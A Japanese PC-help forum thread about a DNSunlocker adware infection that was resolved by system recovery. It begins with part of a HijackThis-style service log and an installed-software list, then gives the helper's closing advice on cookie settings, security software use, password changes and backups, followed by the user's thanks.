O23 - Service: Dropbox アップデート サービス (dbupdate) (dbupdate) - Dropbox, Inc. - C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
O23 - Service: Dropbox アップデート サービス (dbupdatem) (dbupdatem) - Dropbox, Inc. - C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
O23 - Service: Dritek WMI Service (DsiWMIService) - Dritek System Inc. - C:\Program Files (x86)\Launch Manager\dsiwmis.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: EgisTec Ticket Service - Egis Technology Inc. - C:\Program Files (x86)\Common Files\EgisTec\Services\EgisTicketService.exe
O23 - Service: ePower Service (ePowerSvc) - Acer Incorporated - C:\Program Files\Acer\Acer ePower Management\ePowerSvc.exe
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: FLEXnet Licensing Service - Acresso Software Inc. - C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
O23 - Service: GREGService - Acer Incorporated - C:\Program Files (x86)\Acer\Registration\GREGsvc.exe
O23 - Service: Google Update サービス (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update サービス (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Intel(R) Rapid Storage Technology (IAStorDataMgrSvc) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\Windows\system32\IEEtwCollector.exe (file missing)
O23 - Service: Intel(R) Capability Licensing Service Interface - Intel(R) Corporation - C:\Program Files\Intel\iCLS Client\HeciServer.exe
O23 - Service: iPod サービス (iPod Service) - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Intel(R) Dynamic Application Loader Host Interface Service (jhi_service) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Live Updater Service - Acer Incorporated - C:\Program Files\Acer\Acer Updater\UpdaterService.exe
O23 - Service: Intel(R) Management and Security Application Local Management Service (LMS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
O23 - Service: Logitech Gaming Registry Service (LogiRegistryService) - Logitech Inc. - C:\Program Files\Logicool Gaming Software\Drivers\APOService\LogiRegistryService.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Norton Online Backup (NOBU) - Symantec Corporation - C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe
O23 - Service: NTI IScheduleSvc - NTI Corporation - C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: Intel(R) Turbo Boost Technology Monitor 2.5 (TurboBoost) - Intel(R) Corporation - C:\Program Files\Intel\TurboBoost\TurboBoost.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: Intel(R) Management and Security Application User Notification Service (UNS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: Broadcom Wireless LAN Tray Service (wltrysvc) - Broadcom Corporation - C:\Program Files\Broadcom\Broadcom 802.11 Network Adapter\WLTRYSVC.EXE
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 9496 bytes


cc -----------------------

7-Zip 15.10 beta (x64) Igor Pavlov 2015/11/07 4.70 MB 15.10
Acer Backup Manager NTI Corporation 2012/06/20 337 MB 3.0.0.100
Acer Crystal Eye Webcam CyberLink Corp. 2015/11/06 41.3 MB 1.5.2108.00
Acer ePower Management Acer Incorporated 2015/11/06 6.00.3010
Acer eRecovery Management Acer Incorporated 2012/06/20 5.00.3508
Acer Registration Acer Incorporated 2015/11/06 1.04.3507
Acer ScreenSaver Acer Incorporated 2015/11/06 20.11.1107.1418
Acer Updater Acer Incorporated 2012/06/20 1.02.3501
Adobe Flash Player 19 ActiveX Adobe Systems Incorporated 2015/11/11 4.48 MB 19.0.0.245
Apple Application Support(32 ビット) Apple Inc. 2015/11/06 114 MB 4.1
Apple Application Support(64 ビット) Apple Inc. 2015/11/06 128 MB 4.1
Apple Mobile Device Support Apple Inc. 2015/11/06 28.0 MB 9.1.0.6
Apple Software Update Apple Inc. 2015/11/06 2.40 MB 2.1.4.131
Bonjour Apple Inc. 2015/11/06 2.01 MB 3.1.0.1
BookLive!Reader BookLive 2012/06/20 87.2 MB 1.8.10
Broadcom Card Reader Driver Installer Broadcom Corporation 2015/11/06 2.76 MB 15.0.7.3
Broadcom NetLink Controller Broadcom Corporation 2012/06/20 524 KB 15.0.7.1
Broadcom Wireless Utility Broadcom Corporation 5.100.82.120
CCleaner Piriform 2015/11/06 5.11
clear.fi Media Acer Incorporated 2015/11/06 2.00.3006
clear.fi Media Acer Incorporated 2015/11/06 2.00.3006
clear.fi Photo Acer Incorporated 2015/11/06 2.00.3006
clear.fi Photo Acer Incorporated 2015/11/06 2.00.3006
CyberLink MediaEspresso CyberLink Corp. 2012/06/20 166 MB 6.5.2727_43992
Dropbox Dropbox, Inc. 2015/11/08 3.10.11
ETDWare PS/2-X64 10.6.9.9_WHQL ELAN Microelectronic Corp. 2015/11/06 10.6.9.9
Google Chrome Google Inc. 2015/11/06 48.0.2560.0
Identity Card Acer Incorporated 2015/11/06 1.00.3501
Intel(R) Control Center Intel Corporation 1.2.1.1007
Intel(R) Management Engine Components Intel Corporation 8.0.2.1410
Intel(R) OpenCL CPU Runtime Intel Corporation
Intel(R) Processor Graphics Intel Corporation 8.15.10.2712
Intel(R) Rapid Storage Technology Intel Corporation 11.1.0.1006
Intel® Trusted Connect Service Client Intel Corporation 2015/11/06 10.6 MB 1.23.605.1
iTunes Apple Inc. 2015/11/06 218 MB 12.3.1.23
Jane Style Version 3.83 Jane, Inc. 2015/11/08 3.83
Janetter 4.3.1.0 Jane, Inc. 2015/11/06
Launch Manager Acer Inc. 2015/11/06 5.1.15
Logicool ゲームソフトウェア 8.72 Logicool 2015/11/06 160 MB 8.72.107
Microsoft .NET Framework 4 Client Profile Language Pack - 日本語 Microsoft Corporation 2015/11/07 2.93 MB 4.0.30319
Microsoft .NET Framework 4.5.2 Microsoft Corporation 2015/11/07 38.8 MB 4.5.51209
Microsoft OneDrive Microsoft Corporation 2015/11/08 36.8 MB 17.3.6201.1019
Microsoft Security Essentials Microsoft Corporation 2015/11/06 4.8.204.0
Microsoft Silverlight Microsoft Corporation 2015/11/06 50.7 MB 5.1.40728.0
Microsoft SQL Server 2005 Compact Edition [ENU] Microsoft Corporation 2012/06/20 1.69 MB 3.1.0000
Microsoft Visual C++ 2005 Redistributable Microsoft Corporation 2015/11/06 2.62 MB 8.0.59193
Microsoft Visual C++ 2005 Redistributable (x64) Microsoft Corporation 2015/11/06 570 KB 8.0.61000
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 Microsoft Corporation 2015/11/06 788 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 Microsoft Corporation 2015/11/07 788 KB 9.0.30729.6161
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 Microsoft Corporation 2012/06/20 608 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 Microsoft Corporation 2012/06/20 586 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 Microsoft Corporation 2015/11/06 592 KB 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 Microsoft Corporation 2015/11/07 600 KB 9.0.30729.6161
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.30319 Microsoft Corporation 2015/11/06 13.7 MB 10.0.30319
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.30319 Microsoft Corporation 2015/11/06 11.0 MB 10.0.30319
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 Microsoft Corporation 2015/11/06 20.5 MB 12.0.30501.0
MyWinLocker Suite Egis Technology Inc. 2012/06/20 2.63 MB 4.0.14.19
newsXpresso esobi Inc. 2012/06/20 7.34 MB 1.0.0.40
Norton Online Backup Symantec Corporation 2012/06/20 6.19 MB 2.1.17869
NTI Media Maker 9 NTI Corporation 2015/11/06 0.96 GB 9.0.2.9006
PDF-Viewer Tracker Software Products Ltd 2015/11/09 52.8 MB 2.5.315.0
Realtek High Definition Audio Driver Realtek Semiconductor Corp. 2015/11/06 6.0.1.6543
Skype(TM) 7.13 Skype Technologies S.A. 2015/11/11 75.9 MB 7.13.101
Welcome Center Acer Incorporated 2015/11/06 1.02.3507
Windows Live Essentials Microsoft Corporation 2012/06/20 15.4.3538.0513
インテル(R) ターボ・ブースト・テクノロジー・モニター 2.5 インテル 2015/11/06 13.2 MB 2.5.1.0
  • あすとろ
  • 2015/11/13 (Fri) 02:27:14
返信フォームへ 
あとはセキュリティ意識と環境をしっかり守ってください
作業と報告、ご苦労様です。
今度はSkypeも更新できてますね。
>Skype(TM) 7.13 Skype Technologies S.A. 2015/11/11 75.9 MB 7.13.101

ようやく正常な初期状態に戻ったようです。
ではそこから以後の再被害を防ぐための自衛をひとつずつ固め直していってください。
本題の処置については何とか終了です。

ブラウザの設定を少し固めるだけでも、セキュリティ上の効果を高めることが可能です。
「インターネットオプション」→「プライバシー」→「詳細設定」と開いて、「自動cookie処理」と「サードパーティのcookieをブロック」にチェックして「適用」して「OK」。
これをやっておくと、多くの危険サイトからの保護にかなり有効です。
が、これもすべての危険サイトに有効でもないし、本物の危険サイトではこの程度ではまったく太刀打ちできないので、過信はしないこと。
また、「すべてのcookieをブロックする」設定にすると、プロバイダのメールボックスなどログイン必要なページに入れなくなる弊害も出るので、これは状況を考えて使い分けるといいでしょう。
安全なサイトでもcookieブロックだと閲覧や投稿ができなくなるところもあるのでこれも注意。

次に、アンチウイルスやファイアウォール等のセキュリティソフトの使い方も注意してください。
セキュリティソフトはただ入れてさえいればそれだけでフル機能を発揮するものではありません。
設定と機能をできるだけ把握して、正しく使うことが重要です。
間違った使い方すると、本来ならブロックできた感染でもあっさりスルーします。

また、いくら高性能なセキュリティソフトがあっても、ユーザーが自分から危険なサイトやファイルにアクセスしてたらまったく保護もできません。
セキュリティソフトは使い方次第でその性能を、倍にも半にも無にも変動させます。

そして百聞は一見にしかず。
現在この掲示板で継続中や解決済みの他スレもできるだけ見ておくことをおすすめします。
同様、類似、別種含めて参考になる部分は多いでしょう。

ですがリカバリ前のPCで入力したことのある各種パスワード等の情報は可能な限り全部変更をお勧めしておきます。
特にネットショッピングやバンキングしたことでもあればそれらの情報は最優先で変更必須です。

また必要なデータ類は普段からこまめにバックアップしておく癖もつけましょう。
感染がなくてもPCのハード的異常で、重要データが救出できなくなったら諦めるしかなくなります。
バックアップがあれば代用or買い替えPCでデータの継続使用は容易です。
セキュリティとPCの安定運用はどちらが欠けても使い物になりません。

結局今回はリカバリでの対処になってしまってすみませんでしたが、今回の苦労を糧に替えて以後は少しずつでもPC環境とセキュリティ意識を再構築していってください。

慣れない作業を長期間頑張ってくれてお疲れ様でした。
以後は安全で快適なPCライフを
  • 悪代官
  • 2015/11/13 (Fri) 22:15:50
返信フォームへ 
Re: DNSunlockerの感染
はい、上記の点、以後気をつけるようにしたいと思います。

最初からリカバリをすれば早い話だったのですが、私の無理につき合わせていただいてすみません。それと同時にありがとうございました。

またこのようなことがあれば(ないように気をつけたいと思いますが)ここに訪れようと思います。

最後に改めて、ありがとうございました。
  • あすとろ
  • 2015/11/15 (Sun) 01:19:11
返信フォームへ 

返信フォーム
プレビュー (投稿前に内容を確認)
  
Template by  マシマロック